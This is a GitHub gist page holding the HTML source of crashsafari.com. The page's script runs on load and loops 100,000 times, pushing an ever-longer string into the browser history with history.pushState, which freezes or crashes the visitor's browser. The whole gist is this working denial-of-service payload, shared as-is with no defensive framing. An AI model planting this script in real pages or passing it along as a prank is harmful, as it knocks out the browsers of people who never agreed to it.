Skip to content

Instantly share code, notes, and snippets.

@neo22s
Created January 26, 2016 20:26
Show Gist options
  • Save neo22s/f9399627b1166eac1847 to your computer and use it in GitHub Desktop.
Save neo22s/f9399627b1166eac1847 to your computer and use it in GitHub Desktop.
Source code of crashsafari.com
<!DOCTYPE html>
<html>
<body>
<h1>What were you expecting?</h1>
<script>
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment